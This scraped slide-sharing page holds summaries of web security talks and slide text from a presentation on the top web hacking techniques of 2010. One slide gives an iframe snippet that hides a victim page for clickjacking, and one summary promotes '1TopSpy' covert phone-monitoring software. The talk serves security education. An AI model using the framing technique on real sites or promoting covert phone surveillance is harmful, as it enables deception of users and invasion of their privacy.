This document provides information on open source intelligence (OSINT) techniques for information gathering. It discusses performing passive, semi-passive, and active information gathering. Key areas of focus are infrastructure intelligence gathering to identify networks and domains, and people/organization intelligence gathering to find emails, metadata in documents, and profiles of employees. A variety of tools are recommended to automate the process, including Maltego, theHarvester, FOCA, and APIs from services like Zoominfo.
This document describes how to use 1TopSpy software to hack and track any mobile phone within 5 minutes. It lists the features of 1TopSpy including tracking GPS location, monitoring text messages, calls, WhatsApp messages, and more. The summary describes downloading and installing 1TopSpy on the target phone, logging into the 1TopSpy website to begin monitoring. Customer testimonials praise 1TopSpy for allowing worried parents and businesses to discreetly monitor mobile activity.
Devfest istanbul'14 - Web Application Attacks and Trusting FrameworksMehmet Ince
Frameworks are undeniably one of the most important elements of frameworks. As we continue to witness a significant increase in number of framework-based attacks towards web applications each day, usage of Frameworks without considering security-related aspects continue to be the most drastic problem that developers face. Throughout the presentation; Mr. İnce will analyze one of the most commonly-used PHP web frameworks by highlighting important security considerations; followed by a real-time exploitation of discovered vulnerability in LAB environment.
Many notable and new web hacking techniques, discoveries and compromises were uncovered in 2008. During his session, the top 10 vulnerabilities present in 2008, as well as some of the prevalent security issues emerging in 2009. Attendees will virtually be able to walk through the vulnerabilities appearing on today’s corporate websites, learning real-world solutions to today’s web application security issues.
Moderator: Mike Stephenson, SC lab manager, SC Magazine
- Jeremiah Grossman, founder and chief technology officer, WhiteHat Security
Rich Web App Security - Keeping your application safeJeremiah Grossman
The document discusses securing web applications from common vulnerabilities like cross-site scripting (XSS) and cross-site request forgery (CSRF). It outlines various techniques attackers use to exploit these issues, such as injecting malicious scripts into user input or forging unauthorized requests. The document then provides recommendations for developers to prevent these attacks, such as carefully validating and encoding all user input, and authenticating that requests are intended by the user.
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
Cross-Site Request Forgery (CSRF) is a major web vulnerability that forces users to perform unintended actions on websites. It remains underreported due to the difficulty of detection. CSRF can be used to hijack user accounts, modify browser settings, and force purchases without user awareness or consent. While solutions like tokens exist, many websites remain vulnerable to CSRF attacks.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in “securITy” Information Security Conference at BASIS SoftExpo 2012
The document provides instructions for setting up a lab environment to practice HTML5 hacking techniques. It includes details on installing VirtualBox and shared folders, as well as IP addresses to use for the "localvictim" and "evil" servers. The remainder of the document outlines a plan to cover various HTML5-related attacks, including bypassing the same-origin policy, exploiting XSS vectors in HTML5, attacking with cross-origin resource sharing and web messaging, targeting client-side storage, and using web sockets. Disclaimers are provided about the practical nature of the workshops and limited time.
Top 10 Web Hacks
Every year the number and creativity of Web hacks increases, and the damage from these attacks rises exponentially, costing organizations millions every year.
Join this webinar to learn about the latest and most insidious Web-based attacks. The much anticipated list, now in its seventh year, represents exhaustive research conducted by a panel of experienced security industry professionals. Learn the latest of the worst in Web hacks, and how to protect your organization.
Cross-Site Request Forgery (CSRF) is a type of malicious attack that tricks a user into unknowingly executing unwanted actions on a web application. The attacker creates hidden HTTP requests that get executed in the victim's browser using their authentication credentials. This allows the attacker to perform sensitive functions like changing passwords, making purchases, or posting comments on the victim's behalf. Defenses include using secret tokens or custom headers to validate requests and prevent CSRF attacks. The Firefox add-on CsFire also helps protect users by removing authentication information from cross-domain requests.
1) The document discusses new hacking techniques that can exploit browsers and access internal corporate networks even when the browser has JavaScript disabled or restricted. These techniques bypass traditional perimeter security measures.
2) One technique uses CSS to steal a user's browsing history without JavaScript. Another obtains the user's internal IP address using a Java applet and then port scans the internal network to find vulnerabilities.
3) The author concludes that a user's browser, when visiting public websites, can potentially be silently hijacked to target and hack resources on the internal corporate network.
The document discusses security considerations for HTML5. It notes that while HTML5 specifications are not inherently flawed, bad code can introduce new vulnerabilities. It outlines several attack vectors like XSS, history tampering, web storage manipulation, and clickjacking. It also discusses mitigations like script isolation, cross-document messaging, sandboxing, and CORS, noting their limitations. The document aims to raise awareness of the expanded client-side attack surface in HTML5.
The document discusses various techniques for hacking client-side insecurities, including discovering clients on the internet and intranet, attacking client-side through JavaScript jacking and pluggable protocol handlers, exploiting cross-site request forgery vulnerabilities, and fingerprinting clients through analysis of HTTP headers and browser information leaks. The presentation aims to demonstrate these hacking techniques through examples and a question/answer session.
Renaud Bido & Mohammad Shams - Hijacking web servers & clientsnooralmousa
The document discusses threats from hijacking web servers and clients, including keyloggers, browser compromise, cross-site scripting (XSS) attacks, and real-world examples of XSS exploitation. It also provides an overview of DenyAll, a French web application firewall vendor, including their clients, partners, and global presence.
The document discusses web application security vulnerabilities and countermeasures. It begins with definitions of web applications and websites. It then outlines common vulnerabilities like misconfiguration, client-side issues, authentication errors, cross-site scripting, SQL injection, and cross-site request forgery. For each vulnerability, it provides details on how attacks work and potential consequences. It also discusses defenses and tools to mitigate risks.
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
This document discusses the Heartbleed vulnerability in OpenSSL and its potential impacts. Heartbleed is a bug in the OpenSSL cryptography library that exposes the contents of the server's memory, including private keys and user session cookies. An attacker can exploit Heartbleed to steal sensitive data from vulnerable servers or impersonate services. The vulnerability had widespread implications because OpenSSL is used to secure a majority of websites. While patching servers and changing passwords addressed direct theft of information, Heartbleed also weakened the security of encrypted communications and online identities.
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
The document discusses various cybersecurity topics including vulnerabilities, threats, attacks, and countermeasures. It provides an overview of the Open Web Application Security Project (OWASP) which focuses on improving application security. It also summarizes common web vulnerabilities like cross-site scripting (XSS), SQL injection, buffer overflows, and cross-site request forgery (CSRF). Recommendations are given to prevent these vulnerabilities.
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.
The document discusses a new web security technique called cross-site tracing (XST) that can bypass the HTTP-only security feature in Internet Explorer 6 SP1 and perform cross-site scripting attacks. XST exploits the TRACE HTTP request method, which echoes request information to the client, to obtain authentication cookies from other domains over HTTP and HTTPS. While HTTP-only helps prevent cookie access via JavaScript, XST can still access cookies through TRACE requests.
CONFidence 2015: The Top 10 Web Hacks of 2014 - Matt Johansen, Johnathan KuskosPROIDEA
Speakers: Matt Johansen, Johnathan Kuskos
Language: English
Every year the security community produces a stunning number of new Web hacking techniques. Now in its 9th year, the Top 10 Web Hacking Techniques list encourages information and knowledge sharing and recognizes researchers who contribute excellent work. In this talk, we will do a technical deep dive and take you through the Top 10 Web Hacks of 2014, as picked by an expert panel of judges. The full list is available here: https://blog.whitehatsec.com/top-10-web-hacking-techniques-of-2014/
CONFidence: http://confidence.org.pl/pl/
The document discusses cross-site scripting (XSS) vulnerabilities. It defines XSS as allowing malicious scripts to be served to users from a vulnerable website. There are different types of XSS vulnerabilities including those without storage and with storage of malicious scripts on the website. The document provides examples of XSS vulnerabilities and discusses how they can be used to steal user credentials and track users. It also outlines challenges in preventing XSS vulnerabilities.
Similar to Top Ten Web Hacking Techniques (2010) (20)
There is a serious misalignment of interests between Application Security vulnerability assessment vendors and their customers. Vendors are incentivized to report everything they possible can, even issues that rarely matter. On the other hand, customers just want the vulnerability reports that are likely to get them hacked. Every finding beyond that is a waste of time, money, and energy, which is precisely what’s happening every day.
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
This document provides an analysis of the attack surface for 19 major healthcare organizations based on data collected by Bit Discovery from public sources on the internet. It includes statistics on each organization's total assets, domain names, cloud assets, use of content delivery networks, certificate authorities, expired certificates, geographic distribution, private IP addresses, WordPress vulnerabilities, and recommendations for building a security program around mapping the attack surface.
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
The present study examined a selection of 76 ransomware splash screens collected from a variety of sources. These splash screens were analysed according to surface information, including aspects of visual appearance, the use of language, cultural icons, payment and payment types. The results from the current study showed that, whilst there was a wide variation in the construction of ransomware splash screens, there was a good degree of commonality, particularly in terms of the structure and use of key aspects of social engineering used to elicit payment from the victims. There was the emergence of a sub-set of ransomware that, in the context of this report, was termed ‘Cuckoo’ ransomware. This type of attack often purported to be from an official source requesting payment for alleged transgressions.
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
Ransomware is center stage, as campaigns are practically guaranteed financial gain. Cyber-criminals profit hundreds of millions of dollars by selling our data back to us. If you look closely, the ransomware economic dynamics closely follow the real-world kidnapping and ransom industry. We’ll explore the eerie similarities, where ransomware is headed, and strategies we can bring to the fight.
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
Ransomware is center stage, as campaigns are practically guaranteed financial gain. Cyber-criminals profit hundreds of millions of dollars by selling our data back to us. If you look closely, the ransomware economic dynamics closely follow the real-world kidnapping and ransom industry. We’ll explore the eerie similarities, where ransomware is headed, and strategies we can bring to the fight.
This document provides an overview and buyer's guide for next generation endpoint protection (NGEP). It discusses the limitations of traditional antivirus software and the evolving threat landscape. A new behavior-based approach using NGEP is presented as a solution. Key criteria for evaluating NGEP vendors are outlined, including the critical capabilities an effective solution should provide. SentinelOne is presented as an NGEP option, highlighting its behavior monitoring approach and ability to detect, prevent, and remediate both known and unknown threats.
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
If you’re an IT professional, you probably know at least the basics of ransomware. Instead of using malware or an exploit to exfiltrate PII from an enterprise, bad actors instead find valuable data and encrypt it. Unless you happen to have an NSA-caliber data center at your disposal to break the encryption, you must pay your attacker in cold, hard bitcoins—or else wave goodbye to your PII. Those assumptions aren’t wrong, but they also don’t tell the whole picture.
During this event we’ll discuss topics such as:
Why Ransomware is Exploding
The growth of ransomware, as opposed to garden-variety malware, is enormous. Hackers have found that they can directly monetize the data they encrypt, which eliminates the time-consuming process of selling stolen data on the Darknet. In addition, the use of ransomware requires little in the way of technical skill—because attackers don’t need to get root on a victim’s machine.
Who the Real Targets Are
Two years ago, the most newsworthy victims of ransomware were various police departments. This year, everyone is buzzing about hospitals. Is this a deliberate pattern? Probably not. Enterprises are so ill-prepared for ransomware that attackers have a green field to wreak havoc. Until the industry shapes up, bad actors will target ransomware indiscriminately.
Where Ransomware Stumbles
Although ransomware is nearly impossible to dislodge when employed correctly, you may be surprised to find that not all bad actors have the skill to do it. Even if ransomware targets your network, you may learn that your attackers have used extremely weak encryption—or that they’ve encrypted files that are entirely non-critical.
As far as ransomware is concerned, forewarned is forearmed. Once you know how attackers deliver ransomware, who they’re likely to attack, and the weaknesses in the ransomware deployment model, you’ll be able to understand how to protect your enterprise.
This year WhiteHat SecurityTM celebrates its fteenth anniversary, and the eleventh year that we have produced the Web Applications Security Statistics Report. The stats shared in this report are based on the aggregation of all the scanning and remediation data obtained from applications that used the WhiteHat SentinelTM service for application security testing in 2015. As an early pioneer in the Application Security Market, WhiteHat has a large and unique collection of data to work with.
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
Jeremiah Grossman is the founder of WhiteHat Security, a company that helps secure websites by finding vulnerabilities in source code and production and helping companies fix them. Organized crime has become the most frequent threat actor for web app attacks according to Verizon. Many websites remain vulnerable for long periods, with 60% of retail sites always vulnerable. Compliance is the top priority for resolving vulnerabilities according to 15% of respondents, while risk reduction is the top priority for 35% of respondents.
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
This document summarizes Jeremiah Grossman's 15 years of experience in web security and the state of application security. It discusses threat actors targeting websites, the growing costs of data breaches and cyber insurance, challenges with vulnerability remediation, and the need for more effective software development processes and addressing skill shortages. WhiteHat Security helps companies find and fix application vulnerabilities before exploits.
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
WhiteHat Security’s Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address in order to conduct business online safely.
Website security is an ever-moving target. New website launches are common, new code is released constantly, new web technologies are created and adopted every day; as a result, new attack techniques are frequently disclosed that can put every online business at risk. In order to stay protected, enterprises must receive timely information about how they
can most efficiently defend their websites, gain visibility into
the performance of their security programs, and learn how they compare with their industry peers. Obtaining these insights
is crucial in order to stay ahead and truly improve enterprise website security.
To help, WhiteHat Security has been publishing its Website Security Statistics Report since 2006. This report is the only one that focuses exclusively on unknown vulnerabilities in custom web applications, code that is unique to an organization, and found in real-world websites. The underlying data is hundreds of terabytes in size, comprises vulnerability assessment results from tens of thousands of websites across hundreds of the most well- known organizations, and collectively represents the largest and most accurate picture of website security available. Inside this report is information about the most prevalent vulnerabilities, how many get fixed, how long the fixes can take on average, and how every application security program may measurably improve. The report is organized by industry, and is accompanied by WhiteHat Security’s expert analysis and recommendations.
This document is a website security statistics report from 2015 that analyzes vulnerability data from tens of thousands of websites. Some of the key findings include:
- Compliance-driven organizations have the lowest average number of vulnerabilities but the highest remediation rates, while risk reduction-driven organizations have more vulnerabilities but fix them faster.
- Feeding vulnerability results back to development teams significantly reduces vulnerabilities, speeds up fixes, and increases remediation rates.
- Performing static code analysis more frequently is correlated with faster vulnerability fix times.
- Ad hoc code reviews of high-risk applications appear to be one of the most effective activities at reducing vulnerabilities.
- There is no clear evidence that any particular "best practice"
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
Ever notice how everything in InfoSec is sold “as is”? No guarantees, no warrantees, no return policies. For some reason in InfoSec, providing customers with a form of financial coverage for their investment is seen as gimmicky, but the tides and times are changing. This talk discusses use cases on why guarantees are a must have and how guarantees benefit customers as well as InfoSec as a whole.
In this report, we put this area of application security understanding to the test by measuring how various web programming languages and development frameworks actually perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that the most popular modern languages and frameworks yield similar results in production websites?
By analyzing the vulnerability assessment results of more than 30,000 websites under management with WhiteHat Sentinel, we begin to answer these questions. These answers may enable the application security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas. Software vendors may focus on areas that are found to be lacking. Developers can increase their familiarity with the strengths and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and must be virtually transparent. Only then will application security progress be made.
In this report, we put this area of application security understanding to the test by measuring how various web programming languages and development frameworks actually perform in the field. To which classes of attack are they most prone, how often and for how long; and, how do they fare against popular alternatives? Is it really true that the most popular modern languages and frameworks yield similar results in production websites?
By analyzing the vulnerability assessment results of more than 30,000 websites under management with WhiteHat Sentinel, we begin to answer these questions. These answers may enable the application security community to ask better and deeper questions, which will eventually lead to more secure websites. Organizations deploying these technologies can have a closer look at particularly risk-prone areas. Software vendors may focus on areas that are found to be lacking. Developers can increase their familiarity with the strengths and weaknesses of their technology stack. All of this is vitally important because security must be baked into development frameworks and must be virtually transparent. Only then will application security progress be made.
http://blackhat.com/us-13/briefings.html#Grossman
Online advertising networks can be a web hacker’s best friend. For mere pennies per thousand impressions (that means browsers) there are service providers who allow you to broadly distribute arbitrary javascript -- even malicious javascript! You are SUPPOSED to use this “feature” to show ads, to track users, and get clicks, but that doesn’t mean you have to abide. Absolutely nothing prevents spending $10, $100, or more to create a massive javascript-driven browser botnet instantly. The real-world power is spooky cool. We know, because we tested it… in-the-wild.
With a few lines of HTML5 and javascript code we’ll demonstrate just how you can easily commandeer browsers to perform DDoS attacks, participate in email spam campaigns, crack hashes and even help brute-force passwords. Put simply, instruct browsers to make HTTP requests they didn’t intend, even something as well-known as Cross-Site Request Forgery. With CSRF, no zero-days or malware is required. Oh, and there is no patch. The Web is supposed to work this way. Also nice, when the user leaves the page, our code vanishes. No traces. No tracks.
Before leveraging advertising networks, the reason this attack scenario didn’t worry many people is because it has always been difficult to scale up, which is to say, simultaneously control enough browsers (aka botnets) to reach critical mass. Previously, web hackers tried poisoning search engine results, phishing users via email, link spamming Facebook, Twitter and instant messages, Cross-Site Scripting attacks, publishing rigged open proxies, and malicious browser plugins. While all useful methods in certain scenarios, they lack simplicity, invisibility, and most importantly -- scale. That’s what we want! At a moment’s notice, we will show how it is possible to run javascript on an impressively large number of browsers all at once and no one will be the wiser. Today this is possible, and practical.
WhiteHat Security’s Website Security Statistics Report provides a one-of-a-kind perspective on the state of website security and the issues that organizations must address in order to conduct business online safely.
Website security is an ever-moving target. New website launches are common, new code is released constantly, new Web technologies are created and adopted every day; as a result, new attack techniques are frequently disclosed that can put every online business at risk. In order to stay protected, enterprises must receive timely information about how they can most efficiently defend their websites, gain visibility into the performance of their security programs, and learn how they compare with their industry peers. Obtaining these insights is crucial in order to stay ahead and truly improve enterprise website security.
To help, WhiteHat Security has been publishing its Website Security Statistics Report since 2006. This report is the only one that focuses exclusively on unknown vulnerabilities in custom Web applications, code that is unique to an organization, and found in real-world websites. The underlying data is hundreds of terabytes in size, comprises vulnerability assessment results from tens of thousands of websites across hundreds of the most well-known organizations, and collectively represents the largest and most accurate picture of website security available. Inside this report is information about the most prevalent vulnerabilities, how many get fixed, how long the fixes can take on average, and how every application security program may measurably improve. The report is organized by industry, and is accompanied by WhiteHat Security’s expert analysis and recommendations.
Through its Software-as-a-Service (SaaS) offering, WhiteHat Sentinel, WhiteHat Security is uniquely positioned to deliver the depth of knowledge that organizations require to protect their brands, attain compliance, and avert costly breaches.
This document summarizes the key findings from the WhiteHat Security Website Security Statistics Report from June 2012. The report analyzed vulnerabilities across 7,000 websites from hundreds of organizations. Some of the main findings include:
- The average number of serious vulnerabilities per website dropped significantly from 230 in 2010 to 79 in 2011.
- Cross-site scripting remained the most prevalent vulnerability, found in 55% of websites.
- Web application firewalls could have mitigated 71% of custom application vulnerabilities.
- Banking websites had the fewest vulnerabilities on average with 17 per site.
- Overall, organizations fixed 63% of serious vulnerabilities, up from 53% the prior year.
Quality Patents: Patents That Stand the Test of TimeAurora Consulting
Is your patent a vanity piece of paper for your office wall? Or is it a reliable, defendable, assertable, property right? The difference is often quality.
Is your patent simply a transactional cost and a large pile of legal bills for your startup? Or is it a leverageable asset worthy of attracting precious investment dollars, worth its cost in multiples of valuation? The difference is often quality.
Is your patent application only good enough to get through the examination process? Or has it been crafted to stand the tests of time and varied audiences if you later need to assert that document against an infringer, find yourself litigating with it in an Article 3 Court at the hands of a judge and jury, God forbid, end up having to defend its validity at the PTAB, or even needing to use it to block pirated imports at the International Trade Commission? The difference is often quality.
Quality will be our focus for a good chunk of the remainder of this season. What goes into a quality patent, and where possible, how do you get it without breaking the bank?
** Episode Overview **
In this first episode of our quality series, Kristen Hansen and the panel discuss:
⦿ What do we mean when we say patent quality?
⦿ Why is patent quality important?
⦿ How to balance quality and budget
⦿ The importance of searching, continuations, and draftsperson domain expertise
⦿ Very practical tips, tricks, examples, and Kristen’s Musts for drafting quality applications
https://www.aurorapatents.com/patently-strategic-podcast.html
How Social Media Hackers Help You to See Your Wife's Message.pdfHackersList
In the modern digital era, social media platforms have become integral to our daily lives. These platforms, including Facebook, Instagram, WhatsApp, and Snapchat, offer countless ways to connect, share, and communicate.
7 Most Powerful Solar Storms in the History of Earth.pdfEnterprise Wired
Solar Storms (Geo Magnetic Storms) are the motion of accelerated charged particles in the solar environment with high velocities due to the coronal mass ejection (CME).
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-InTrustArc
Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
Implementations of Fused Deposition Modeling in real worldEmerging Tech
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. **Manufacturing**: FDM is utilized in manufacturing for rapid prototyping, creating custom tools and fixtures, and producing functional end-use parts. Companies leverage its cost-effectiveness and flexibility to streamline production processes.
2. **Medical**: In the medical field, FDM is used to create patient-specific anatomical models, surgical guides, and prosthetics. Its ability to produce precise and biocompatible parts supports advancements in personalized healthcare solutions.
3. **Education**: FDM plays a crucial role in education by enabling students to learn about design and engineering through hands-on 3D printing projects. It promotes innovation and practical skill development in STEM disciplines.
4. **Science**: Researchers use FDM to prototype equipment for scientific experiments, build custom laboratory tools, and create models for visualization and testing purposes. It facilitates rapid iteration and customization in scientific endeavors.
5. **Automotive**: Automotive manufacturers employ FDM for prototyping vehicle components, tooling for assembly lines, and customized parts. It speeds up the design validation process and enhances efficiency in automotive engineering.
6. **Consumer Electronics**: FDM is utilized in consumer electronics for designing and prototyping product enclosures, casings, and internal components. It enables rapid iteration and customization to meet evolving consumer demands.
7. **Robotics**: Robotics engineers leverage FDM to prototype robot parts, create lightweight and durable components, and customize robot designs for specific applications. It supports innovation and optimization in robotic systems.
8. **Aerospace**: In aerospace, FDM is used to manufacture lightweight parts, complex geometries, and prototypes of aircraft components. It contributes to cost reduction, faster production cycles, and weight savings in aerospace engineering.
9. **Architecture**: Architects utilize FDM for creating detailed architectural models, prototypes of building components, and intricate designs. It aids in visualizing concepts, testing structural integrity, and communicating design ideas effectively.
Each industry example demonstrates how FDM enhances innovation, accelerates product development, and addresses specific challenges through advanced manufacturing capabilities.
YOUR RELIABLE WEB DESIGN & DEVELOPMENT TEAM — FOR LASTING SUCCESS
WPRiders is a web development company specialized in WordPress and WooCommerce websites and plugins for customers around the world. The company is headquartered in Bucharest, Romania, but our team members are located all over the world. Our customers are primarily from the US and Western Europe, but we have clients from Australia, Canada and other areas as well.
Some facts about WPRiders and why we are one of the best firms around:
More than 700 five-star reviews! You can check them here.
1500 WordPress projects delivered.
We respond 80% faster than other firms! Data provided by Freshdesk.
We’ve been in business since 2015.
We are located in 7 countries and have 22 team members.
With so many projects delivered, our team knows what works and what doesn’t when it comes to WordPress and WooCommerce.
Our team members are:
- highly experienced developers (employees & contractors with 5 -10+ years of experience),
- great designers with an eye for UX/UI with 10+ years of experience
- project managers with development background who speak both tech and non-tech
- QA specialists
- Conversion Rate Optimisation - CRO experts
They are all working together to provide you with the best possible service. We are passionate about WordPress, and we love creating custom solutions that help our clients achieve their goals.
At WPRiders, we are committed to building long-term relationships with our clients. We believe in accountability, in doing the right thing, as well as in transparency and open communication. You can read more about WPRiders on the About us page.
Support en anglais diffusé lors de l'événement 100% IA organisé dans les locaux parisiens d'Iguane Solutions, le mardi 2 juillet 2024 :
- Présentation de notre plateforme IA plug and play : ses fonctionnalités avancées, telles que son interface utilisateur intuitive, son copilot puissant et des outils de monitoring performants.
- REX client : Cyril Janssens, CTO d’ easybourse, partage son expérience d’utilisation de notre plateforme IA plug & play.
Coordinate Systems in FME 101 - Webinar SlidesSafe Software
If you’ve ever had to analyze a map or GPS data, chances are you’ve encountered and even worked with coordinate systems. As historical data continually updates through GPS, understanding coordinate systems is increasingly crucial. However, not everyone knows why they exist or how to effectively use them for data-driven insights.
During this webinar, you’ll learn exactly what coordinate systems are and how you can use FME to maintain and transform your data’s coordinate systems in an easy-to-digest way, accurately representing the geographical space that it exists within. During this webinar, you will have the chance to:
- Enhance Your Understanding: Gain a clear overview of what coordinate systems are and their value
- Learn Practical Applications: Why we need datams and projections, plus units between coordinate systems
- Maximize with FME: Understand how FME handles coordinate systems, including a brief summary of the 3 main reprojectors
- Custom Coordinate Systems: Learn how to work with FME and coordinate systems beyond what is natively supported
- Look Ahead: Gain insights into where FME is headed with coordinate systems in the future
Don’t miss the opportunity to improve the value you receive from your coordinate system data, ultimately allowing you to streamline your data analysis and maximize your time. See you there!
The Rise of Supernetwork Data Intensive ComputingLarry Smarr
Invited Remote Lecture to SC21
The International Conference for High Performance Computing, Networking, Storage, and Analysis
St. Louis, Missouri
November 18, 2021
Blockchain technology is transforming industries and reshaping the way we conduct business, manage data, and secure transactions. Whether you're new to blockchain or looking to deepen your knowledge, our guidebook, "Blockchain for Dummies", is your ultimate resource.
Details of description part II: Describing images in practice - Tech Forum 2024BookNet Canada
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and transcript: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptxSynapseIndia
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation
Mitigating the Impact of State Management in Cloud Stream Processing SystemsScyllaDB
Stream processing is a crucial component of modern data infrastructure, but constructing an efficient and scalable stream processing system can be challenging. Decoupling compute and storage architecture has emerged as an effective solution to these challenges, but it can introduce high latency issues, especially when dealing with complex continuous queries that necessitate managing extra-large internal states.
In this talk, we focus on addressing the high latency issues associated with S3 storage in stream processing systems that employ a decoupled compute and storage architecture. We delve into the root causes of latency in this context and explore various techniques to minimize the impact of S3 latency on stream processing performance. Our proposed approach is to implement a tiered storage mechanism that leverages a blend of high-performance and low-cost storage tiers to reduce data movement between the compute and storage layers while maintaining efficient processing.
Throughout the talk, we will present experimental results that demonstrate the effectiveness of our approach in mitigating the impact of S3 latency on stream processing. By the end of the talk, attendees will have gained insights into how to optimize their stream processing systems for reduced latency and improved cost-efficiency.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo...Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Best Practices for Effectively Running dbt in Airflow.pdfTatiana Al-Chueyr
As a popular open-source library for analytics engineering, dbt is often used in combination with Airflow. Orchestrating and executing dbt models as DAGs ensures an additional layer of control over tasks, observability, and provides a reliable, scalable environment to run dbt models.
This webinar will cover a step-by-step guide to Cosmos, an open source package from Astronomer that helps you easily run your dbt Core projects as Airflow DAGs and Task Groups, all with just a few lines of code. We’ll walk through:
- Standard ways of running dbt (and when to utilize other methods)
- How Cosmos can be used to run and visualize your dbt projects in Airflow
- Common challenges and how to address them, including performance, dependency conflicts, and more
- How running dbt projects in Airflow helps with cost optimization
Webinar given on 9 July 2024
INDIAN AIR FORCE FIGHTER PLANES LIST.pdfjackson110191
These fighter aircraft have uses outside of traditional combat situations. They are essential in defending India's territorial integrity, averting dangers, and delivering aid to those in need during natural calamities. Additionally, the IAF improves its interoperability and fortifies international military alliances by working together and conducting joint exercises with other air forces.
4. 400+ enterprise customers
•Start-ups to Fortune 500
Flagship offering “WhiteHat Sentinel Service”
•1000’s of assessments performed annually
Recognized leader in website security
•Quoted thousands of times by the mainstream press
4
5. About the Top Ten
“Every year the Web security community produces a stunning
amount of new hacking techniques published in various white
papers, blog posts, magazine articles, mailing list emails, etc. Within
the thousands of pages are the latest ways to attack websites, Web
browsers, Web proxies, and so on. Beyond individual vulnerability
instances with CVE numbers or system compromises, we're talking
about brand new and creative methods of Web-based attack.”
5
6. New Techniques
2009 (80)
Creating a rogue CA certificate
2008 (70)
GIFAR (GIF + JAR)
2007 (83)
XSS Vulnerabilities in Common Shockwave Flash Files
2006 (65)
Web Browser Intranet Hacking / Port Scanning
6
7. 2010
69 new techniques
1) 'Padding Oracle' Crypto Attack
2) Evercookie
3) Hacking Auto-Complete
4) Attacking HTTPS with Cache Injection
5) Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution
6) Universal XSS in IE8
7) HTTP POST DoS
8) JavaSnoop
9) CSS History Hack In Firefox Without JavaScript for Intranet Portscanning
10) Java Applet DNS Rebinding
http://jeremiahgrossman.blogspot.com/2011/01/top-ten-web-hacking-techniques-of-2010.html
7
8. Bypassing CSRF with Clickjacking
and HTTP Parameter Pollution
5
Clickjacking is when an attacker invisibly hovers an object
(button, link, etc.) below a user's mouse. When the user
clicks on something they visually see, they're instead
really clicking on something the attacker wanted them to.
HTTP Parameter Pollution is where an attacker submits
multiple input parameters (query string, post data,
cookies, etc.) with the same name. Upon receipt
applications may react in unexpected ways and open up
avenues of server-side and client-side exploitation. By
cleverly leveraging these two former Top Ten attacks,
CSRF attacks can be carried out against a user even
when recommended token defenses are in use.
Lavakumar Kuppan (@lavakumark)
http://blog.andlabs.org/2010/03/bypassing-csrf-protections-with.html
8
9. Clickjacking (Top Ten 2009)
Think of any button – image, link, form, etc. – on any website – that can appear
between the Web browser walls. This includes wire transfer on banks, DSL router
buttons, Digg buttons, CPC advertising banners, Netflix queue.
Next consider that an attacker can invisibly hover these buttons below the user's
mouse, so that when a user clicks on something they visually see, they're actually
clicking on something the attacker wants them to.
What could the bad guy do with that ability?
9
10. Hover Invisible IFRAMEs
HTML, CSS, and JavaScript
may size, follow the mouse
and make transparent third-
party IFRAME content.
<iframe
src="http://victim/page.html"
scrolling="no"
frameborder="0"
style="opacity:.1;filter: alpha(opacity=.1); -moz-opacity 1.0;">!
</iframe>
10
